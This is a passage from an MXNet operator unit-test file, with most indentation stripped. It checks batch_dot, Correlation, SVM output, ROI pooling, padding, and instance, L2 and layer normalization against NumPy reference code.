b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
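# Reference semantics of the Correlation op as implemented above: for each output
# location (i, j) and displacement channel, kernel_size x kernel_size patches of the
# zero-padded inputs are compared at an offset (s2o, s2p) drawn from a grid of
# (2 * (max_displacement // stride2) + 1)**2 displacements, either by elementwise
# product (is_multiply=True) or absolute difference, and the result is averaged over
# kernel_size**2 * channels.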
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
    exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img2.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from a is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                                    names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
            msg = npt.build_err_msg([a, b],
                                    err_msg="Inferred type from b is not as expected, "
                                            "Expected :%s %s %s, Got: %s %s %s"
                                            % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                                    names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
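# Note: mxnet's Pad takes a flat pad_width tuple of (before, after) pairs per axis,
# while np.pad wants a list of pairs; the zip(*[iter(...)] * 2) trick above groups
# e.g. (0, 0, 0, 0, 1, 2, 3, 4) into [(0, 0), (0, 0), (1, 2), (3, 4)].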
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
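# np_instance_norm above is the numpy reference for InstanceNorm: per sample n and
# channel c, y[n, c] = gamma[c] * (x[n, c] - mean(x[n, c])) / sqrt(var(x[n, c]) + eps)
# + beta[c], where mean and var are taken over the spatial dimensions only.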
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
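    # The three modes above normalise by an L2 norm taken over different axes:
    # 'channel' uses the norm along axis 1 (the channel axis) at every spatial
    # location, 'spatial' uses one norm per (batch, channel) over all spatial
    # positions, and 'instance' uses a single norm per sample over everything
    # except the batch axis.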
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
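    # npy_layer_norm_grad implements the standard LayerNorm backward: with
    # x_hat = (x - mean) / std and w = dy * gamma / std, the input gradient is
    # dx = w - mean(w) - x_hat * mean(w * x_hat), where the means are over the
    # normalised axis; dgamma = sum(dy * x_hat) and dbeta = sum(dy), summed over
    # all axes except the normalised one.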
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                        npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                        npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                            npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@with_seed()
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
